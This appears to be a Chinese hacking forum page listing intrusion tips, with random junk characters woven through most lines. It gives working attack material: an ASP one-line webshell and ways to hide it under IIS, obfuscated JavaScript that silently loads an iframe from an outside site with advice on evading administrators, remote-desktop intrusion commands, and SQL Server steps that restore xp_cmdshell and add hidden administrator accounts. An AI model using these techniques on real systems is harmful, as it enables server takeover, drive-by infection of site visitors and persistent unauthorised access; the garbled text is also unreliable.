用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。: z' b7 [5 y" ?7 ]' _

7 \  a. g7 w2 m% ^5 h  x$ Q$ J5 c53、隐藏ASP后门的两种方法- G% ?5 @% z/ y; t: `" w
1、建立非标准目录:mkdir images..\. c, r2 k  [) m  D7 z- `: a& N
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp* m& X. [4 B( S5 M' H3 I0 u7 Y. B. x
通过web访问ASP木马:http://ip/images../news.asp?action=login
, y+ Q* Z0 e* |- |* |如何删除非标准目录:rmdir images..\ /s/ r% A1 j8 H; e% `5 K) u; N
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:% Q2 G% N7 R; O
mkdir programme.asp
9 ]3 s  ]- ]( p2 ^, t3 I" m新建1.txt文件内容:<!--#include file=”12.jpg”-->" x6 ?7 N5 v# Q) g$ @$ R2 E9 i4 y% q
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
) B0 W7 W3 Y5 i$ F$ p, F9 R  y$ battrib +H +S programme.asp
* j6 t2 l5 C0 {0 T通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
) P* h  @  P0 B6 t4 o
% o) l! i$ E5 U9 k% c54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
# L" M; t! W# H然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
3 v, R- J  s% @0 J, q& \! t0 {  l9 K. k( c
55、JS隐蔽挂马- @' V+ H+ M8 `7 J) ^
1.
9 x1 ~3 X* {- E2 X+ P( ]3 y1 Kvar tr4c3="<iframe src=ht";4 P" M. n# g" H$ K+ ?- B2 l: _
tr4c3 = tr4c3+"tp:/";* w2 f4 w  _: n& W5 O; |8 f
tr4c3 = tr4c3+"/ww";
9 `# e% }8 P, r' G7 a- }2 K* _tr4c3 = tr4c3+"w.tr4";. B6 A6 ?$ O  {% ^. X% P
tr4c3 = tr4c3+"c3.com/inc/m";
" S4 a. `& N7 J- G9 p1 ltr4c3 = tr4c3+"m.htm style="display:none"></i";
  i6 d' n1 O/ b1 L7 Y( J! R' mtr4c3 =tr4c3+"frame>'";
0 F3 E. N, W* G. d/ ~# ^# h2 Vdocument.write(tr4c3);9 p% U0 C0 n" \, ]+ V1 }" E! k
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
8 d9 e' }/ f* u6 d2 }0 \# `6 _3 O7 k2 M! m4 y7 A  P  w. a
2.! `( Z4 D0 D& u% h& Y
转换进制,然后用EVAL执行。如; n: C& c' E4 l+ h
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");3 `! E. w0 M* j' C( T5 z4 Y
不过这个有点显眼。1 `$ a3 C/ L( G* u! w5 F$ A
3.
. d- S6 X0 j. i+ N, ?3 p) ndocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
5 W) o$ u( w. q  ^  @最后一点,别忘了把文件的时间也修改下。$ h- U9 v! n' ?2 f& j# H2 ^9 h8 |
6 h% q8 }3 L; A/ h. e
56.3389终端入侵常用DOS命令, A; C# k9 b2 e' P  v
taskkill taskkill /PID 1248 /t
' B( ~7 u6 }" M; g
9 T1 e  w7 V8 j/ A! X  D, stasklist 查进程2 f9 ~0 |. G0 \/ ~: M
. y# K" y  ]$ `0 X: Y- a. P
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
4 K6 U- C& m3 q' b$ _iisreset /reboot
# G. Z4 H0 h9 b$ }% `tsshutdn /reboot /delay:1    重起服务器
& I( [$ U  ^0 G7 T! J
( `) A7 r7 N, D( H7 C2 `9 slogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
7 M, {9 V0 A1 d! X$ R: m  w
9 X8 y8 R  z4 C, l7 @query user 查看当前终端用户在线情况
/ B0 u* t' b* e9 U: }8 Y+ x/ b5 A& D( ?
; U7 U& w$ y3 X; O/ e& |7 N) _- k要显示有关所有会话使用的进程的信息,请键入:query process *
; @, I. ?& A& j# r5 _( S
  m9 n- g& K7 |( w7 }要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
  Z) C8 E# t& ^) A/ J7 W. a
3 C9 ~) a/ ^' \要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
" f4 ?# e0 [; Q
  `  Q( Y& P) N' [7 @要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
" G, t3 w0 G2 u& R: x. |& T& R
! O* t: P8 o  l& B% W9 x命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
# a" m: ~4 a6 @) x* A3 M6 ^0 ~" L) j; m$ C. \7 Y, |
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
0 m4 z1 Y6 m8 V) ^
1 x9 r6 t% Y! D1 p7 A. B命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
# |: @8 D7 L& S
3 [5 {0 M! H5 r, {0 b& {3 e命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
7 r$ g" y) V) `7 I. H
; F( q  o# t2 q& c; ^6 b4 s! b% H56、在地址栏或按Ctrl+O,输入:
0 [$ T& l2 |" k! S; \: q& V+ Pjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
2 u" z: Q* v7 k( p7 n9 Z5 e* S+ b, ?% ^# _
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
" ?$ i! z  x+ a- @: U7 ~4 v* \
1 {- @1 N# _& J; V- \% q. ^, I57、net user的时候,是不能显示加$的用户,但是如果不处理的话,- r$ ^& R! U8 H$ b# _/ B
用net localgroup administrators是可以看到管理组下,加了$的用户的。
6 @0 u* S. P- e6 R) ?
7 E8 N6 M; z2 f% L58、 sa弱口令相关命令" M7 A8 ^. t/ n2 l: q! ]

; ~9 w+ z4 X! {( u4 \' b' d一.更改sa口令方法:
3 A. p+ T4 w$ e( b! s$ h( G用sql综合利用工具连接后,执行命令:. ~' I  {# F% S* b4 m
exec sp_password NULL,'20001001','sa'& i' m6 x( ]5 p
(提示:慎用!)
: R# |# N4 [4 F- O  m. T
/ [1 a0 U. g9 r4 o5 d8 w6 z二.简单修补sa弱口令.& g# O$ h- @  w$ l
7 w5 Y& @1 ]: V
方法1:查询分离器连接后执行:
  Y4 o& r1 t! H# y" P2 Iif exists (select * from
( F' v0 s) k! s* T4 fdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
& H; U( ?/ T  Y; G. P$ j% D% U0 VOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
( {) x( r; w4 X6 _( m( Z: w2 [- @! L3 o- e; ?$ e
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
( P% q+ n0 d1 w& j5 e3 R& |  V$ u* N  |
8 b, D, s" z0 f: U! |% QGO
5 X, Z- u' G& x: t4 Q8 {1 ?0 }$ v
然后按F5键命令执行完毕) I% F! J* _+ G
4 X: H. ~& p$ |/ e1 }
方法2:查询分离器连接后
1 h9 m" A( z8 i+ G) F, M第一步执行:use master9 B: F2 F8 o0 @4 q3 k" W1 |
第二步执行:sp_dropextendedproc 'xp_cmdshell'$ z8 h$ M; p* w0 C7 U5 w) q
然后按F5键命令执行完毕# O3 u& N* O( P3 c- `( ^2 g2 I

% ^9 A5 N! P1 P
* L0 ^2 `  ]/ Z( L+ X) h三.常见情况恢复执行xp_cmdshell.
0 p3 T: ~& {6 r3 R6 r0 Q+ ^4 G; y) t  T3 j: c+ e  c  f

1 ?3 H0 ~2 b4 L$ z2 N1 未能找到存储过程'master..xpcmdshell'., W9 t/ a* J% Q1 Y8 c* K- T
   恢复方法:查询分离器连接后,. J" x, \+ y: A7 Z
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int0 o3 O) y- {/ G0 K7 D  l+ m4 _
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'% y$ g; @' T4 n$ N9 B6 e% x4 ^
然后按F5键命令执行完毕+ s( ^( m& u) G! V: L* `

/ B  M( ]: q8 o; s8 }1 g2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。), l1 `6 i8 E7 v+ i
恢复方法:查询分离器连接后,
/ O$ |1 D; X  ~" u9 N8 w第一步执行:sp_dropextendedproc "xp_cmdshell"
2 o* y+ R2 e7 j' [/ R2 J第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'1 y# X9 X9 `. h6 x. p: D, x$ v
然后按F5键命令执行完毕5 _2 p& K2 Z) p
. O& \/ H$ F3 D- f# K
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)8 v7 K9 ?9 `0 ]& F% B0 S
恢复方法:查询分离器连接后,$ D# G4 Y# Y, }( i
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'3 ^' s+ E$ ^9 Z2 U
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
1 l; `! M3 _' k5 m7 Z然后按F5键命令执行完毕# Z/ z% @, ~- }
6 J6 k) p8 M" u1 z
四.终极方法.$ T$ |& [0 I! ]0 O% G+ f
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
+ G8 a$ O5 \+ d. q查询分离器连接后,( m6 ~1 v( o# R+ [; R, m
2000servser系统:  G% W# F5 ]3 L; g& A
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
* u: A, l) l- b/ u4 C' Q5 C( `7 W
+ d3 \8 d1 c1 P! l' B6 Bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'7 O8 e/ b  n/ ^) b1 A6 x

6 J' h, D+ y/ D  N1 `0 B& ]xp或2003server系统:5 N( r1 z! X0 r9 r" Z# w: O
7 x  F9 Z% O) s: L
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'7 l% w9 \& I6 z' _! d/ F: ]0 L
/ C3 G: s" f1 `! Y: e' E0 b
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add') H7 e9 ^6 }- U$ L: w





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2